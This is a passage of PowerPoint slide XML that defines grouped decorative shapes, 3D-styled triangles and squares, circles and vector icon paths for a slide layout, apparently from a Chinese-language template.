                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
